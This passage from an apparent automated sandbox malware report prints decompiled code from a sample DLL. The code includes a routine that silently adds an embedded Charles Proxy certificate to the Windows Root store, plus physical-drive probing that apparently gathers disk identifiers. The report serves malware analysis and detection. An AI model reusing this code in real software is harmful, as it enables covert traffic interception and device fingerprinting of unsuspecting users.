                                                                                                                                                      0x1000ebd6
                                                                                                                                                      0x1000ebe2
                                                                                                                                                      0x1000ebe8

                                                                                                                                                      APIs
                                                                                                                                                      • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___security_init_cookie
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3657697845-0
                                                                                                                                                      • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                      • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                      • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                      • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10004520, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E10004520(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed char* _v56;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				char* _v148;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				void* _t63;
				void* _t70;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr _t86;
				intOrPtr _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t102 = __eflags;
				_t55 = _a4;
				_t96 = _a8;
				_v184 = E10004490;
				_v180 = E100044C0;
				_v176 = _t55;
				_v172 = _t55;
				_v168 = _t96;
				_t97 = 0;
				E100071F0();
				_v216 = E100046C0;
				_v212 = E100046E0;
				_v200 = E100046C0;
				_v196 = E100046E0;
				E10007530( &_v164, 0);
				_v136 = 0;
				_v136 = _v216( &_v216, _t96);
				_v132 = _t96;
				_v148 =  &_v184;
				_v140 = 0;
				_v144 = 0;
				E100048A0(_t102,  &_v128);
				_t63 = E10006FD0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
				_t100 =  &_v220 + 0x24;
				if(_t63 == 0) {
					_v204 = 0xffffffff;
					_v208 = 0;
					_v220 = 0;
					_v192 = 0;
					_v188 = 0;
					if(( *_v56 & 0x00000080) == 0) {
						_t70 = E10007010( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
						_t100 = _t100 + 0x28;
						if(_t70 == 0) {
							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
							_t97 = _t73;
							if(_t97 != 0) {
								_t76 = _a12;
								_t107 = _t76;
								_t86 = _v220;
								if(_t76 != 0) {
									 *_t76 = _t86;
								}
								E1000D190(0, _t96, _t97, _t97, _v208, _t86);
								_t100 = _t100 + 0xc;
								 *((char*)(_v220 + _t97)) = 0;
							}
							_v212( &_v216, _v208);
							_t100 = _t100 + 8;
						}
					}
				}
				E100048E0(_t107,  &_v128,  &_v216);
				return _t97;
			}






































                                                                                                                                                      0x10004520
                                                                                                                                                      0x10004526
                                                                                                                                                      0x10004530
                                                                                                                                                      0x10004537
                                                                                                                                                      0x1000453f
                                                                                                                                                      0x10004547
                                                                                                                                                      0x1000454b
                                                                                                                                                      0x1000454f
                                                                                                                                                      0x10004555
                                                                                                                                                      0x10004557
                                                                                                                                                      0x10004562
                                                                                                                                                      0x1000456a
                                                                                                                                                      0x10004572
                                                                                                                                                      0x1000457a
                                                                                                                                                      0x10004582
                                                                                                                                                      0x1000458d
                                                                                                                                                      0x10004595
                                                                                                                                                      0x100045a2
                                                                                                                                                      0x100045a6
                                                                                                                                                      0x100045aa
                                                                                                                                                      0x100045ae
                                                                                                                                                      0x100045b2
                                                                                                                                                      0x100045ce
                                                                                                                                                      0x100045d3
                                                                                                                                                      0x100045d8
                                                                                                                                                      0x100045e5
                                                                                                                                                      0x100045ed
                                                                                                                                                      0x100045f1
                                                                                                                                                      0x100045f5
                                                                                                                                                      0x100045f9
                                                                                                                                                      0x10004600
                                                                                                                                                      0x10004637
                                                                                                                                                      0x1000463c
                                                                                                                                                      0x10004641
                                                                                                                                                      0x10004653
                                                                                                                                                      0x10004659
                                                                                                                                                      0x1000465d
                                                                                                                                                      0x1000465f
                                                                                                                                                      0x10004666
                                                                                                                                                      0x10004668
                                                                                                                                                      0x1000466c
                                                                                                                                                      0x1000466e
                                                                                                                                                      0x1000466e
                                                                                                                                                      0x10004677
                                                                                                                                                      0x10004680
                                                                                                                                                      0x10004683
                                                                                                                                                      0x10004683
                                                                                                                                                      0x10004690
                                                                                                                                                      0x10004694
                                                                                                                                                      0x10004694
                                                                                                                                                      0x10004641
                                                                                                                                                      0x10004600
                                                                                                                                                      0x100046a1
                                                                                                                                                      0x100046b4

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004653
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                      • Instruction ID: 5f3268faf400ee4384dde952e7e6cf138bea3fab27ca3dfaa28aee59be70a859
                                                                                                                                                      • Opcode Fuzzy Hash: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                      • Instruction Fuzzy Hash: BB4119B6408341AFD310CF55D88099BBBE8FBC8294F404E1EF59983255EB71E909CBA7
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AB20, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AB20(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                                                                                                      0x1001ab2f
                                                                                                                                                      0x1001ab36

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB2F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                      • Opcode ID: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                      • Instruction ID: c3865ccbcae920e215e079fb98926607579ac42653a45aa6abdb7f6c5b589da4
                                                                                                                                                      • Opcode Fuzzy Hash: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                      • Instruction Fuzzy Hash: F4C04C7621420CABCB04DF98DCD4CAB77ADAB8CB10B10C508FB1D87200C634F9118BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 1001F720, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                      			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69);
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF20(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF20(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF20(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA30(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}






























                                                                                                                                                      0x1001f720
                                                                                                                                                      0x1001f720
                                                                                                                                                      0x1001f720
                                                                                                                                                      0x1001f729
                                                                                                                                                      0x1001f730
                                                                                                                                                      0x1001f737
                                                                                                                                                      0x1001f73e
                                                                                                                                                      0x1001f745
                                                                                                                                                      0x1001f766
                                                                                                                                                      0x1001f77a
                                                                                                                                                      0x1001f77f
                                                                                                                                                      0x1001f782
                                                                                                                                                      0x1001f785
                                                                                                                                                      0x1001f789
                                                                                                                                                      0x1001f7a3
                                                                                                                                                      0x1001f7a9
                                                                                                                                                      0x1001f7b3
                                                                                                                                                      0x1001f7b9
                                                                                                                                                      0x1001f7bf
                                                                                                                                                      0x1001f7c0
                                                                                                                                                      0x1001f7c5
                                                                                                                                                      0x1001f7cc
                                                                                                                                                      0x1001f7e2
                                                                                                                                                      0x1001f7e8
                                                                                                                                                      0x1001f7ef
                                                                                                                                                      0x1001f7f9
                                                                                                                                                      0x1001f801
                                                                                                                                                      0x1001f809
                                                                                                                                                      0x1001f817
                                                                                                                                                      0x1001f81d
                                                                                                                                                      0x1001f822
                                                                                                                                                      0x1001f828
                                                                                                                                                      0x1001f82f
                                                                                                                                                      0x1001f842
                                                                                                                                                      0x1001f848
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f859
                                                                                                                                                      0x1001f85e
                                                                                                                                                      0x1001f861
                                                                                                                                                      0x1001f864
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f87b
                                                                                                                                                      0x1001f891
                                                                                                                                                      0x1001f897
                                                                                                                                                      0x1001f8ac
                                                                                                                                                      0x1001f8b4
                                                                                                                                                      0x1001f8c9
                                                                                                                                                      0x1001f8ce
                                                                                                                                                      0x1001f8d1
                                                                                                                                                      0x1001f8ec
                                                                                                                                                      0x1001f8f2
                                                                                                                                                      0x1001f8f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001f91c
                                                                                                                                                      0x1001f921
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f939
                                                                                                                                                      0x1001f95d
                                                                                                                                                      0x1001f963
                                                                                                                                                      0x1001f964
                                                                                                                                                      0x1001f969
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f7cc
                                                                                                                                                      0x1001f789
                                                                                                                                                      0x1001f988

                                                                                                                                                      APIs
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                      • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                      • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                      • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                      • API String ID: 3311258246-1857994723
                                                                                                                                                      • Opcode ID: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
                                                                                                                                                      • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                      • Opcode Fuzzy Hash: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
                                                                                                                                                      • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D7E0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1001D7E0(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF20(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF20(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CD70( &_v1596);
					_t94 = E1001CFA0(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}





































                                                                                                                                                      0x1001d7e0
                                                                                                                                                      0x1001d7ec
                                                                                                                                                      0x1001d7f3
                                                                                                                                                      0x1001da64
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da64
                                                                                                                                                      0x1001d7f9
                                                                                                                                                      0x1001d803
                                                                                                                                                      0x1001d80d
                                                                                                                                                      0x1001d81a
                                                                                                                                                      0x1001d831
                                                                                                                                                      0x1001d84c
                                                                                                                                                      0x1001d852
                                                                                                                                                      0x1001d871
                                                                                                                                                      0x1001d878
                                                                                                                                                      0x1001da3d
                                                                                                                                                      0x1001da4c
                                                                                                                                                      0x1001da55
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da5f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da57
                                                                                                                                                      0x1001d87e
                                                                                                                                                      0x1001d888
                                                                                                                                                      0x1001d892
                                                                                                                                                      0x1001d89c
                                                                                                                                                      0x1001d8a6
                                                                                                                                                      0x1001d8b0
                                                                                                                                                      0x1001d8ba
                                                                                                                                                      0x1001d8eb
                                                                                                                                                      0x1001da37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da37
                                                                                                                                                      0x1001d8fa
                                                                                                                                                      0x1001da16
                                                                                                                                                      0x1001da1a
                                                                                                                                                      0x1001da27
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da31
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da29
                                                                                                                                                      0x1001d914
                                                                                                                                                      0x1001d91f
                                                                                                                                                      0x1001d925
                                                                                                                                                      0x1001d92c
                                                                                                                                                      0x1001d933
                                                                                                                                                      0x1001d93a
                                                                                                                                                      0x1001d941
                                                                                                                                                      0x1001d948
                                                                                                                                                      0x1001d94f
                                                                                                                                                      0x1001d956
                                                                                                                                                      0x1001d95d
                                                                                                                                                      0x1001d96f
                                                                                                                                                      0x1001d99b
                                                                                                                                                      0x1001d9a0
                                                                                                                                                      0x1001d9a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d9ad
                                                                                                                                                      0x1001d9b6
                                                                                                                                                      0x1001d9b9
                                                                                                                                                      0x1001d9c2
                                                                                                                                                      0x1001d9ca
                                                                                                                                                      0x1001d9d3
                                                                                                                                                      0x1001d9dc
                                                                                                                                                      0x1001d9f0
                                                                                                                                                      0x1001da00
                                                                                                                                                      0x1001da05
                                                                                                                                                      0x1001da0a
                                                                                                                                                      0x1001da0c
                                                                                                                                                      0x1001da0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da0a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001D831
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                      • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D8E3
                                                                                                                                                      • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 381188756-2935326385
